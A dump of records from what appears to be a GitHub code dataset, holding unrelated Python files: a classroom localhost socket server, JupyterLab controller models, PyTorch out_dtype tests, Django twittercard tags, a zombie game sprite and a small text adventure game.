pd.concat([df_test[\"card_id\"],pd.Series(predictions)],axis=1)\npredictions_df.to_csv(\"xbart_pred_3.csv\",index=False)\noof.to_csv(\"xbart_off_3.csv\",index=False)\nprint(\"CV score: 
{:<8.5f}\".format(mean_squared_error(oof, target.values)**0.5))\n\n","repo_name":"socket778/XBCF","sub_path":"python_xbcf/tests/OutlierModel.py","file_name":"OutlierModel.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"25404834757","text":"import socket\r\nimport base64\r\n \r\nMSG_DATA = b'SGVsbG8gV29ybGQhICBZb3UgaGF2ZSByZWNlaXZlZCBhIG1lc3NhZ2Ugb3ZlciBhIHNvY2tldA=='\r\nHOST = '127.0.0.1' # Symbolic name meaning all available interfaces\r\nPORT = 9231 # Arbitrary non-privileged port\r\n \r\nclass SocketServer():\r\n def __init__(self, bindHost = HOST, bindPort = PORT):\r\n \"\"\"Create a generic socket for binding\"\"\"\r\n self.theSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print('Socket created')\r\n\r\n try:\r\n self.theSocket.bind((bindHost, bindPort))\r\n except socket.error as msg:\r\n print('Bind failed. Error Code : ' + msg.strerror)\r\n exit()\r\n\r\n print('Socket bind complete; ready to send message')\r\n \r\n def listen(self):\r\n \"\"\"Opens the socket for listening. Once connected returns the connection stream for message transmission\"\"\"\r\n self.theSocket.listen(0)\r\n print('Socket now listening')\r\n \r\n #wait to accept a connection - blocking call\r\n self.conn, self.addr = self.theSocket.accept()\r\n\r\n print('Connected with ' + self.addr[0] + ':' + str(self.addr[1]))\r\n return self.conn\r\n\r\n def transmit(self, msg):\r\n \"\"\"Transmits a message across the socket\"\"\"\r\n # send our message to the client\r\n self.conn.sendall(msg)\r\n \r\n def close(self):\r\n \"\"\"Closes the socket and releases the port\"\"\"\r\n # close the connection and the socket\r\n self.conn.close()\r\n self.theSocket.close()\r\n\r\ndef main():\r\n print( \"My IP address is\", socket.gethostbyname(socket.gethostname()), flush=True )\r\n socketObj = SocketServer()\r\n socketObj.listen()\r\n socketObj.transmit(base64.b64decode(MSG_DATA))\r\n socketObj.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"NathanRuprecht/CS210_IntroToProgramming","sub_path":"DailyLabs/Lsn33/SimpleSocketServer.py","file_name":"SimpleSocketServer.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12243818838","text":"\"\"\"API-visible models for user lab environments.\"\"\"\n\nfrom __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Any, Self\n\nfrom kubernetes_asyncio.client import V1ResourceRequirements\nfrom pydantic import BaseModel, Field, field_validator, model_validator\n\nfrom ...constants import DROPDOWN_SENTINEL_VALUE, USERNAME_REGEX\nfrom ..domain.gafaelfawr import GafaelfawrUserInfo, UserGroup\n\n__all__ = [\n \"ImageClass\",\n \"LabResources\",\n \"LabSize\",\n \"LabSpecification\",\n \"LabStatus\",\n \"PodState\",\n \"ResourceQuantity\",\n \"UserGroup\",\n \"UserInfo\",\n \"UserLabState\",\n \"UserOptions\",\n]\n\n\nclass LabSize(str, Enum):\n \"\"\"Allowable names for pod sizes.\n\n Taken from `d20 creature sizes`_.\n \"\"\"\n\n FINE = \"fine\"\n DIMINUTIVE = \"diminutive\"\n TINY = \"tiny\"\n SMALL = \"small\"\n MEDIUM = \"medium\"\n LARGE = \"large\"\n HUGE = \"huge\"\n GARGANTUAN = \"gargantuan\"\n COLOSSAL = \"colossal\"\n\n CUSTOM = \"custom\"\n \"\"\"A custom lab size.\n\n Used for lab sizes of existing labs that don't match any of our\n currently-configured sizes.\n \"\"\"\n\n\nclass LabStatus(Enum):\n \"\"\"Possible 
states the user's lab may be in.\"\"\"\n\n    PENDING = \"pending\"\n    RUNNING = \"running\"\n    TERMINATING = \"terminating\"\n    FAILED = \"failed\"\n\n    @classmethod\n    def from_phase(cls, phase: str) -> LabStatus:\n        \"\"\"Convert a Kubernetes pod phase to a lab status.\n\n        Be aware that it is not possible to detect Kubernetes pods that are in\n        the process of being terminated by looking only at the phase\n        (``Terminating`` is not a pod phase). This method will return\n        ``RUNNING`` if the container is still running or ``FAILED`` if it has\n        stopped.\n\n        Parameters\n        ----------\n        phase\n            Kubernetes pod phase, from the ``Pod`` object.\n\n        Returns\n        -------\n        LabStatus\n            Corresponding lab status.\n        \"\"\"\n        if phase == \"Running\":\n            return cls.RUNNING\n        elif phase == \"Pending\":\n            return cls.PENDING\n        else:\n            return cls.FAILED\n\n\nclass PodState(Enum):\n    \"\"\"Possible states the user's pod may be in.\"\"\"\n\n    PRESENT = \"present\"\n    MISSING = \"missing\"\n\n\n\"\"\"POST /nublado/spawner/v1/labs/<username>/create\"\"\"\n\n\nclass ImageClass(Enum):\n    \"\"\"Supported classes of images.\n\n    These keywords can be passed into the spawn form to spawn whatever image\n    matches this class, as determined by the lab controller. This is primarily\n    used when spawning notebooks for bot users.\n    \"\"\"\n\n    RECOMMENDED = \"recommended\"\n    LATEST_RELEASE = \"latest-release\"\n    LATEST_WEEKLY = \"latest-weekly\"\n    LATEST_DAILY = \"latest-daily\"\n\n\nclass UserOptions(BaseModel):\n    \"\"\"User-provided lab configuration options.\n\n    All values to this model can instead be given as lists of length one with\n    boolean values converted to the strings ``true`` or ``false``. This allows\n    JupyterHub to pass its form submission directly to the lab controller\n    without modifications.\n    \"\"\"\n\n    image_list: str | None = Field(\n        None,\n        examples=[\"lighthouse.ceres/library/sketchbook:w_2023_07@sha256:abcd\"],\n        title=\"Image from selection radio button\",\n        description=\"If this is set, `image_dropdown` should not be set.\",\n    )\n    image_dropdown: str | None = Field(\n        None,\n        examples=[\"lighthouse.ceres/library/sketchbook:w_2022_40\"],\n        title=\"Image from dropdown list\",\n        description=(\n            \"If this is set, `image_list` should be omitted or set to\"\n            f\" `{DROPDOWN_SENTINEL_VALUE}`.\"\n        ),\n    )\n    image_class: ImageClass | None = Field(\n        None,\n        examples=[ImageClass.RECOMMENDED],\n        title=\"Class of image to spawn\",\n        description=(\n            \"Spawn a class of image determined by the lab controller. Not\"\n            \" used by the user form, but may be used by bots creating labs.\"\n            \" Only one of `image_class` or `image_tag` may be given, and\"\n            \" neither `image_list` nor `image_dropdown` should be set when\"\n            \" using these options.\"\n        ),\n    )\n    image_tag: str | None = Field(\n        None,\n        examples=[\"w_2023_07\"],\n        title=\"Tag of image to spawn\",\n        description=(\n            \"Spawn the image with the given tag. Not used by the user form,\"\n            \" but may be used by bots creating labs. 
Only one of `image_class`\"\n \" `image_tag` may be given, and neither `image_list` nor\"\n \" `image_dropdown` should be set when using these options.\"\n ),\n )\n size: LabSize = Field(..., examples=[LabSize.MEDIUM], title=\"Image size\")\n enable_debug: bool = Field(\n False,\n examples=[True],\n title=\"Enable debugging in spawned Lab\",\n )\n reset_user_env: bool = Field(\n False,\n examples=[True],\n title=\"Relocate user environment (`.cache`, `.jupyter`, `.local`)\",\n )\n\n @property\n def image_attribute(self) -> str:\n \"\"\"The name of the image attribute that was set.\n\n Used for error reporting to know what input attribute to report when\n the image specification was invalid.\n \"\"\"\n if self.image_list:\n return \"image_list\"\n elif self.image_dropdown:\n return \"image_dropdown\"\n elif self.image_class:\n return \"image_class\"\n else:\n return \"image_tag\"\n\n @model_validator(mode=\"before\")\n @classmethod\n def _validate_lists(\n cls, data: dict[str, Any] | Self\n ) -> dict[str, Any] | Self:\n \"\"\"Convert from lists of length 1 to values.\n\n JupyterHub passes the value of the input form directly to the lab\n controller via this model. This means that each submitted field is a\n list, due to implementation details of JupyterHub, but in each case\n the list must have exactly one element and we don't want the list\n wrapper. Also accept values without the list wrapping for direct calls\n to the lab controller via the same API.\n \"\"\"\n if not isinstance(data, dict):\n return data\n new_data = {}\n for key, value in data.items():\n if value is None:\n continue\n if isinstance(value, list):\n if not value:\n continue\n if len(value) != 1:\n raise ValueError(f\"Too many values for {key}\")\n new_data[key] = value[0]\n else:\n new_data[key] = value\n return new_data\n\n @model_validator(mode=\"after\")\n def _validate_one_image(self) -> Self:\n \"\"\"Ensure that the image is only specified in one way.\"\"\"\n if self.image_list == DROPDOWN_SENTINEL_VALUE:\n self.image_list = None\n\n # image_dropdown will have a spurious value if image_list is set,\n # due to the form design, so in that case use image_list. 
(Unless\n # it has the sentinel value, but that's handled above.)\n if self.image_list:\n self.image_dropdown = None\n\n # See which image attributes are set.\n values_set = {\n attr\n for attr in (\n \"image_list\",\n \"image_dropdown\",\n \"image_class\",\n \"image_tag\",\n )\n if getattr(self, attr, None)\n }\n\n # Check that exactly one of them is set.\n if len(values_set) < 1:\n raise ValueError(\"No image to spawn specified\")\n if len(values_set) > 1:\n keys = \", \".join(sorted(values_set))\n raise ValueError(f\"Image specified multiple ways ({keys})\")\n return self\n\n @field_validator(\"enable_debug\", \"reset_user_env\", mode=\"before\")\n @classmethod\n def _validate_booleans(cls, v: bool | str) -> bool:\n \"\"\"Convert boolean values from strings.\"\"\"\n if isinstance(v, bool):\n return v\n elif v == \"true\":\n return True\n elif v == \"false\":\n return False\n else:\n raise ValueError(f\"Invalid boolean value {v}\")\n\n @field_validator(\"size\", mode=\"before\")\n @classmethod\n def _validate_size(cls, v: Any) -> Any:\n \"\"\"Lab sizes may be title-cased, so convert them to lowercase.\"\"\"\n if isinstance(v, LabSize):\n return v\n elif isinstance(v, str):\n return v.lower()\n else:\n return v\n\n\nclass LabSpecification(BaseModel):\n \"\"\"Specification of lab to spawn, sent by the JupyterHub spawner.\"\"\"\n\n options: UserOptions = Field(\n ...,\n title=\"User-chosen lab options\",\n description=\"Represents the choices made on the spawner form\",\n )\n env: dict[str, str] = Field(\n ...,\n title=\"Environment variables\",\n description=(\n \"Environment variables from JupyterHub. JUPYTERHUB_SERVICE_PREFIX\"\n \" must be set\"\n ),\n )\n\n @field_validator(\"env\")\n @classmethod\n def _validate_env(cls, v: dict[str, str]) -> dict[str, str]:\n if \"JUPYTERHUB_SERVICE_PREFIX\" not in v:\n raise ValueError(\"JUPYTERHUB_SERVICE_PREFIX must be set\")\n return v\n\n\n\"\"\"GET /nublado/spawner/v1/labs/\"\"\"\n\"\"\"GET /nublado/spawner/v1/user-status\"\"\"\n\n\nclass UserInfo(BaseModel):\n \"\"\"Metadata about the user who owns the lab.\"\"\"\n\n username: str = Field(\n ...,\n examples=[\"ribbon\"],\n title=\"Username for Lab user\",\n pattern=USERNAME_REGEX,\n )\n name: str | None = Field(\n None,\n examples=[\"Ribbon\"],\n title=\"Human-friendly display name for user\",\n description=(\n \"May contain spaces, capital letters, and non-ASCII characters.\"\n \" Should be the user's preferred representation of their name to\"\n \" other humans.\"\n ),\n )\n uid: int = Field(\n ...,\n examples=[1104],\n title=\"Numeric UID for user (POSIX)\",\n description=\"32-bit unsigned integer\",\n )\n gid: int = Field(\n ...,\n examples=[1104],\n title=\"Numeric GID for user's primary group (POSIX)\",\n description=\"32-bit unsigned integer\",\n )\n groups: list[UserGroup] = Field([], title=\"User's group memberships\")\n\n @classmethod\n def from_gafaelfawr(cls, user: GafaelfawrUserInfo) -> Self:\n \"\"\"Convert Gafaelfawr's user metadata model to this model.\n\n Parameters\n ----------\n user\n Gafaelfawr user metadata.\n\n Returns\n -------\n UserInfo\n User information stored as part of the lab state.\n \"\"\"\n return cls(\n username=user.username,\n name=user.name,\n uid=user.uid,\n gid=user.gid,\n groups=[g for g in user.groups if g.id],\n )\n\n\nclass ResourceQuantity(BaseModel):\n cpu: float = Field(\n ...,\n examples=[1.5],\n title=\"Kubernetes CPU resource quantity\",\n description=(\n \"cf. 
\"\n \"https://kubernetes.io/docs/tasks/\"\n \"configure-pod-container/assign-cpu-resource/\"\n ),\n )\n memory: int = Field(\n ...,\n examples=[1073741824],\n title=\"Kubernetes memory resource in bytes\",\n )\n\n\nclass LabResources(BaseModel):\n limits: ResourceQuantity = Field(..., title=\"Maximum allowed resources\")\n requests: ResourceQuantity = Field(\n ..., title=\"Intially-requested resources\"\n )\n\n def to_kubernetes(self) -> V1ResourceRequirements:\n \"\"\"Convert to the Kubernetes object representation.\"\"\"\n return V1ResourceRequirements(\n limits={\n \"cpu\": str(self.limits.cpu),\n \"memory\": str(self.limits.memory),\n },\n requests={\n \"cpu\": str(self.requests.cpu),\n \"memory\": str(self.requests.memory),\n },\n )\n\n\nclass UserLabState(LabSpecification):\n \"\"\"Current state of the user's lab.\"\"\"\n\n user: UserInfo = Field(..., title=\"User who owns the lab\")\n status: LabStatus = Field(\n ..., examples=[\"running\"], title=\"Status of user container\"\n )\n pod: PodState = Field(..., examples=[\"present\"], title=\"User pod state\")\n internal_url: str | None = Field(\n None,\n examples=[\"http://nublado-ribbon.nb-ribbon:8888\"],\n title=\"URL by which the Hub can access the user Pod\",\n )\n resources: LabResources = Field(..., title=\"Resource limits and requests\")\n quota: ResourceQuantity | None = Field(\n None, title=\"Quota for all user resources\"\n )\n\n @classmethod\n def from_request(\n cls,\n user: GafaelfawrUserInfo,\n lab: LabSpecification,\n resources: LabResources,\n ) -> Self:\n \"\"\"Create state for a new lab that is about to be spawned.\n\n Parameters\n ----------\n user\n Owner of the lab.\n lab\n Lab specification from JupyterHub.\n resources\n Resource limits and requests for the lab (normally derived from\n the lab size).\n\n Returns\n -------\n UserLabState\n New user lab state representing a lab that's about to be spawned.\n \"\"\"\n quota = None\n if user.quota and user.quota.notebook:\n quota = ResourceQuantity(\n cpu=user.quota.notebook.cpu,\n memory=int(user.quota.notebook.memory * 1024 * 1024 * 1024),\n )\n return cls(\n user=UserInfo.from_gafaelfawr(user),\n options=lab.options,\n env=lab.env,\n status=LabStatus.PENDING,\n pod=PodState.MISSING,\n resources=resources,\n quota=quota,\n )\n","repo_name":"lsst-sqre/jupyterlab-controller","sub_path":"src/jupyterlabcontroller/models/v1/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7473165706","text":"# Owner(s): [\"module: functorch\"]\nimport unittest\n\nimport torch\nimport torch._dynamo\nimport torch._export\nfrom torch._higher_order_ops.out_dtype import out_dtype\nfrom torch.fx.experimental.proxy_tensor import make_fx\nfrom torch.testing._internal.common_utils import run_tests, TestCase\nfrom torch.testing import FileCheck\n\n\n@unittest.skipIf(not torch._dynamo.is_dynamo_supported(), \"dynamo isn't support\")\nclass TestOutDtypeOp(TestCase):\n def test_out_dtype_make_fx(self):\n class M(torch.nn.Module):\n def __init__(self, weight):\n super().__init__()\n self.weight = weight\n\n def forward(self, x):\n return out_dtype(\n torch.ops.aten.mm.default, torch.int32, x, self.weight\n )\n\n weight = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n m = M(weight)\n x = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n\n gm = make_fx(m)(x)\n self.assertTrue(torch.allclose(m(x), gm(x)))\n\n gm = make_fx(torch.func.functionalize(M(weight)))(x)\n 
self.assertTrue(torch.allclose(m(x), gm(x)))\n\n        FileCheck().check(\"torch.ops.higher_order.out_dtype\").check(\"aten.mm.default\").run(gm.code)\n        self.assertTrue(torch.allclose(m(x), gm(x)))\n        for node in gm.graph.nodes:\n            if node.op == \"call_function\" and node.target is out_dtype:\n                # Result of this node should be int32\n                self.assertEqual(node.meta[\"val\"].dtype, torch.int32)\n                # Argument of this node should be int8\n                self.assertEqual(node.args[2].meta[\"val\"].dtype, torch.int8)\n\n    def test_out_dtype_op_functional(self):\n        class M(torch.nn.Module):\n            def __init__(self, weight):\n                super().__init__()\n                self.weight = weight\n\n            def forward(self, x):\n                return out_dtype(\n                    torch.ops.aten.mm.default, torch.int32, x, self.weight\n                )\n\n        weight = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n        m = M(weight)\n        x = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n        ep = torch._export.export(\n            m,\n            (x,),\n        )\n        FileCheck().check(\"torch.ops.higher_order.out_dtype\").check(\"aten.mm.default\").run(ep.graph_module.code)\n        self.assertTrue(torch.allclose(m(x), ep(x)))\n        for node in ep.graph.nodes:\n            if node.op == \"call_function\" and node.target is out_dtype:\n                # Result of this node should be int32\n                self.assertEqual(node.meta[\"val\"].dtype, torch.int32)\n                # Argument of this node should be int8\n                self.assertEqual(node.args[2].meta[\"val\"].dtype, torch.int8)\n\n    def test_out_dtype_mm_numerical(self):\n        class M(torch.nn.Module):\n            def __init__(self, weight):\n                super().__init__()\n                self.weight = weight\n\n            def forward(self, x):\n                return out_dtype(\n                    torch.ops.aten.mm.default, torch.int32, x, self.weight\n                )\n\n        weight = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n        m = M(weight)\n        x = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n\n        gm = make_fx(m)(x)\n\n        x_casted = x.to(torch.int32)\n        weight_casted = weight.to(torch.int32)\n        numerical_res = torch.ops.aten.mm.default(x_casted, weight_casted)\n        self.assertTrue(torch.allclose(numerical_res, gm(x)))\n\n    def test_out_dtype_dynamo(self):\n        def f(x, y):\n            return out_dtype(\n                torch.ops.aten.mul.Scalar, torch.int32, x, y\n            )\n\n        inp = (torch.randint(-128, 127, (5, 5), dtype=torch.int8), 3.0)\n\n        compiled = torch.compile(f, backend=\"eager\", fullgraph=True)\n        self.assertTrue(torch.allclose(f(*inp), compiled(*inp)))\n\n    def test_out_dtype_mul_scalar_numerical(self):\n        def f(x, y):\n            return out_dtype(\n                torch.ops.aten.mul.Scalar, torch.int32, x, y\n            )\n\n        inp = (torch.randint(-128, 127, (5, 5), dtype=torch.int8), 3.0)\n\n        gm = make_fx(f)(*inp)\n        numerical_res = torch.ops.aten.mul.Scalar(inp[0].to(dtype=torch.int32), 3)\n        self.assertTrue(torch.allclose(numerical_res, gm(*inp)))\n\n    def test_out_dtype_non_functional(self):\n        def f(x, y):\n            return out_dtype(\n                torch.ops.aten.add_.Tensor, torch.int32, x, y\n            )\n\n        with self.assertRaisesRegex(ValueError, \"out_dtype's first argument needs to be a functional operator\"):\n            _ = torch._export.export(\n                f, (torch.randint(-128, 127, (5, 5), dtype=torch.int8), torch.randint(-128, 127, (5, 5), dtype=torch.int8)),\n            )\n\n    def test_out_dtype_non_op_overload(self):\n        def f(x, y):\n            return out_dtype(\n                torch.add, torch.int32, x, y\n            )\n\n        with self.assertRaisesRegex(ValueError, \"out_dtype's first argument must be an OpOverload\"):\n            f(torch.randint(-128, 127, (5, 5), dtype=torch.int8), torch.randint(-128, 127, (5, 5), dtype=torch.int8))\n\n    def test_out_dtype_no_autograd(self):\n        def f(x, y):\n            return out_dtype(\n                torch.ops.aten.mm.default, torch.int32, x, y\n            )\n\n        inp = (torch.randn(5, 5, 
requires_grad=True), torch.randn(5, 5, requires_grad=True))\n # error is delayed\n f(*inp)\n\n with torch.no_grad():\n f(*inp)\n\n with self.assertRaisesRegex(RuntimeError, \"does not require grad and does not have a grad_fn\"):\n out = f(*inp)\n loss = out - torch.ones(out.shape)\n loss.backward()\n\n def test_out_dtype_wrong_output(self) -> None:\n def multiple_out(x):\n return out_dtype(\n torch.ops.aten.topk.default, torch.int32, x, 5\n )\n\n inp = (torch.randn(10),)\n\n with self.assertRaisesRegex(ValueError, \"out_dtype's can only apply to ops that return a single tensor\"):\n multiple_out(*inp)\n\n def singleton_list_out(x):\n return out_dtype(\n torch.ops.aten.split_copy.Tensor, torch.int32, x, 10\n )\n\n with self.assertRaisesRegex(ValueError, \"out_dtype's can only apply to ops that return a single tensor\"):\n singleton_list_out(*inp)\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"ashen-sensored/pytorch","sub_path":"test/test_out_dtype_op.py","file_name":"test_out_dtype_op.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10594681989","text":"from django import template\nfrom django.conf import settings\nregister = template.Library()\n\ndef twittercard_summary(context, *args, **kwargs):\n card = get_twittercard_attributes(kwargs)\n card['card'] = 'summary'\n request = context['request']\n card['url'] = kwargs.get('url', request.build_absolute_uri())\n return card\nregister.inclusion_tag('twittercard/summary.html', takes_context=True)(twittercard_summary)\n\ndef twittercard_photo(context, *args, **kwargs):\n card = get_twittercard_attributes(kwargs)\n card['card'] = 'photo'\n card['image_width'] = kwargs.get('image_width', None)\n card['image_height'] = kwargs.get('image_height', None)\n return card\nregister.inclusion_tag('twittercard/photo.html', takes_context=True)(twittercard_photo)\n\ndef get_twittercard_attributes(kwargs):\n card = {}\n card['title'] = kwargs.get('title', None)\n card['description'] = kwargs.get('description', None)\n card['image'] = kwargs.get('image', None)\n config = getattr(settings, 'TWITTERCARD_CONFIG', None)\n if config is not None:\n card['site'] = kwargs.get('site', config.get('SITE', None))\n card['site_id'] = kwargs.get('site_id', config.get('SITE_ID', None))\n card['creator'] = kwargs.get('creator', config.get('CREATOR', None))\n card['creator_id'] = kwargs.get('creator_id', config.get('CREATOR_ID', None))\n return card\n","repo_name":"leveille/django-twittercard","sub_path":"twittercard/templatetags/twittercard.py","file_name":"twittercard.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"40098892467","text":"import random\n\nimport pygame\nfrom pygame.locals import *\n\nimport config as c\nfrom misc import get_images_from_sprite_sheet, lcm, transform_image\nfrom sprites import Sprite\n\n\nclass Zombie(Sprite):\n \"\"\"\n Complex base class for zombies\n \"\"\"\n # Animation speed\n animation_frame = c.fps / 10\n counter = 0\n # Characteristics\n health = 200\n speed = 0.23\n damage = 100\n reload = c.fps\n\n groan = 9 * c.fps\n\n def __init__(self, row, images, size=None):\n super().__init__(\n c.sizes[\"win\"][0], # Right after the screen edge\n c.pads[\"game\"][1] + (row - 3 / 4) * c.sizes[\"cell\"][1],\n image=next(images), size=size\n )\n # --------------Animation--------------\n # Burn animation\n self.ignited, _ = 
get_images_from_sprite_sheet(\"assets/zombies/incinerated.png\",\n 6, 5, size=c.sizes[\"zombie\"])\n self.incinerated = False\n # Infinite iterator with images\n # So image update can be easily called with next() func\n self.images = images\n # Real x pos, while rect x is floored\n self.x = self.rect.x\n # Target enemy plant\n self.eating = pygame.sprite.GroupSingle()\n # Freeze chars - makes walking and attacking slower\n self.frozen = False\n self.frozen_reload = self.reload * 2\n self.frozen_speed = self.speed / 2\n # After being shot makes nex image lighter\n self.shot = False\n # Game position\n self.col = c.XCells + 1\n self.row = row\n # --------------Sounds--------------\n self.chomps = (\n pygame.mixer.Sound(\"assets/audio/chomp.wav\"),\n pygame.mixer.Sound(\"assets/audio/chomp2.wav\"),\n pygame.mixer.Sound(\"assets/audio/chompsoft.wav\")\n )\n self.groans = (\n pygame.mixer.Sound(\"assets/audio/groan.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan2.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan3.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan4.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan5.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan6.wav\"),\n )\n self.frozen_sound = pygame.mixer.Sound(\"assets/audio/frozen.wav\")\n self.frozen_sound.set_volume(0.6)\n random.choice(self.groans).play()\n\n def update(self, screen):\n \"\"\"\n Called every tick\n Updates zombie\n\n Either makes zombie go or attack\n Regarding freeze caused py SnowPea's\n Which makes everything slower\n :param screen: pygame.display\n :return: None\n \"\"\"\n # Placed separately not to over complicate if/else statements\n if self.incinerated:\n self.incinerated -= 1\n if self.incinerated % self.animation_frame == 0:\n self.image = next(self.ignited)\n self._draw(screen)\n if self.incinerated == 0:\n self.kill()\n return\n\n self.counter += 1\n # Walk animation\n # Or damage infliction\n if self.counter % self.animation_frame == 0:\n self.image = next(self.images)\n # If zombie is frozen makes its image blue\n if self.frozen:\n self.frozen -= 1\n self.image = transform_image(self.image, r=0, g=0, b=128, alpha=5,\n special_flag=BLEND_RGBA_ADD)\n # If zombie is hit makes it lighter\n if self.shot:\n self.shot = False\n self.image = transform_image(self.image,\n r=64, g=64, b=64, alpha=5,\n special_flag=BLEND_RGBA_ADD)\n if not self.busy(): # If zombie is not eating\n # Movement\n if not self.frozen:\n self.x -= self.speed\n else:\n self.x -= self.frozen_speed\n self.rect.x = int(self.x) + 1\n # Using flooring because pygame rect doesn't support not-int coordinates\n else:\n # Damage infliction\n if (not self.frozen and self.counter % self.reload == 0) or \\\n (self.counter % self.frozen_reload == 0):\n random.choice(self.chomps).play()\n self.deal_damage()\n\n if self.counter % self.groan == 0:\n random.choice(self.groans).play()\n\n self.counter %= lcm(self.reload, self.animation_frame, self.groan)\n # Update cell on the game field\n self.col = int((self.rect.x - c.pads[\"game\"][0] + c.sizes[\"cell\"][0] / 2)\n // c.sizes[\"cell\"][0])\n self._draw(screen)\n\n def take_damage(self, bullet):\n \"\"\"\n Takes damage from bullet and removes it\n Also makes self image blue if projectile.__class__ == SnowProjectile\n :param bullet: Projectile\n :return: None\n \"\"\"\n bullet.deal_damage(self)\n self.check_alive()\n bullet.kill()\n\n if bullet.__class__.__name__ == \"SnowProjectile\":\n self.frozen = bullet.freeze_time\n # Freezes zombie\n self.image = transform_image(self.image, r=0, g=0, b=128, 
alpha=5,\n special_flag=BLEND_RGBA_ADD)\n self.frozen_sound.play()\n\n self.shot = True\n\n def busy(self) -> bool:\n \"\"\"\n Checks if zombie is eating anything\n :return: bool\n \"\"\"\n return bool(len(self.eating))\n\n def coords(self) -> tuple:\n \"\"\"\n Returns coordinates on the game field\n :return: (row, col)\n \"\"\"\n return self.row, self.col\n\n def change_target(self, enemy):\n \"\"\"\n Changes eating target on the given one\n :param enemy: Plant\n :return: None\n \"\"\"\n self.eating.add(enemy)\n\n def check_alive(self):\n \"\"\"\n Kills itself if health below or equals zero\n :return: None\n \"\"\"\n if self.health <= 0:\n self.kill()\n\n def deal_damage(self):\n \"\"\"\n Lowers target plant health\n :return: None\n \"\"\"\n self.eating.sprite.take_damage(self.damage)\n\n def ignite(self):\n \"\"\"\n Plays ignite animation and dies after\n Needed as kill animation for CherryBomb\n :return: None\n \"\"\"\n self.incinerated = self.animation_frame * 30\n","repo_name":"yeya24/PvZc","sub_path":"zombies/zombie.py","file_name":"zombie.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31014122251","text":"import random\nfrom threading import Lock\n\nfrom tools import get_direction, plural_days\n\n\nclass SingletonMeta(type):\n _instances = {}\n _lock: Lock = Lock()\n\n def __call__(cls, *args, **kwargs):\n with cls._lock:\n if cls not in cls._instances or args or kwargs:\n instance = super().__call__(*args, **kwargs)\n cls._instances[cls] = instance\n return cls._instances[cls]\n\n\nclass Adventure(metaclass=SingletonMeta):\n def __init__(self, width=4, height=4, step_counter=False):\n self.world = None\n self.final_position = None\n self.current_position = None\n self.width = width\n self.height = height\n self.generate_game()\n self.is_step_counter_on = step_counter\n self.step_count = 0\n self.is_finished = False\n\n # Генерация мира, финальной и стартовой комнат\n def generate_game(self):\n current_position = [random.randint(1, self.height), random.randint(1, self.width)]\n finish_position = [random.randint(1, self.height), random.randint(1, self.width)]\n while current_position == finish_position:\n finish_position = [random.randint(1, self.height), random.randint(1, self.width)]\n\n total = []\n for x in range(1, self.height + 1):\n line = []\n for y in range(1, self.width + 1):\n di = {f\"Комната {x}-{y}\": [x, y]}\n line.append(di)\n total.append(line)\n\n self.current_position = current_position\n self.final_position = finish_position\n self.world = total\n\n # Совершение \"шага\": проверка его возможности, определение завершения игры и вывода соответствующих сообщений\n def make_step(self, steps, way):\n is_success = False\n alert_type = \"warning\"\n\n if way == 1:\n if self.current_position[0] - steps >= 1:\n self.current_position[0] -= steps\n is_success = True\n elif way == 2:\n if self.current_position[1] + steps <= self.width:\n self.current_position[1] += steps\n is_success = True\n elif way == 3:\n if self.current_position[0] + steps <= self.height:\n self.current_position[0] += steps\n is_success = True\n elif way == 4:\n if self.current_position[1] - steps >= 1:\n self.current_position[1] -= steps\n is_success = True\n\n if is_success:\n\n if self.is_step_counter_on:\n self.step_count += 1\n\n if self.check_win():\n alert_type = \"success\"\n return \"Вы успешно добрались до цели, поздравляю!\\nИгра окончена: можете переиграть её заново, \" \\\n \"или 
создать мир другого размера, вернувшись на главную.\", alert_type\n else:\n return f'Вы сделали {plural_days(steps, \"steps\", False)} на {get_direction(way)}. ' \\\n f'Сейчас вы в комнате {self.current_position[0]}-{self.current_position[1]}', alert_type\n else:\n alert_type = \"danger\"\n return \"Вы не можете сделать этот шаг\", alert_type\n\n # Проверка, завершилась ли игра или нет\n def check_win(self):\n if self.current_position == self.final_position:\n self.is_finished = True\n return self.is_finished\n","repo_name":"zak427zak/strange-adventure-game","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19688065589","text":"from setuptools import find_packages, setup\n\nfrom pyclier import __author__, __name__, __version__\n\n\ndef read_requirements():\n reqs = []\n with open(\"requirements.txt\", \"r\") as f:\n for line in f:\n reqs.append(line.strip())\n return reqs\n\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name=__name__,\n version=__version__,\n author=__author__,\n description=\"A python CLI framework base on argparse, supporting: config system, command-completion, rich-text log and so on.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/zhangxianbing/pyclier\",\n packages=find_packages(include=[f\"{__name__}*\"]),\n 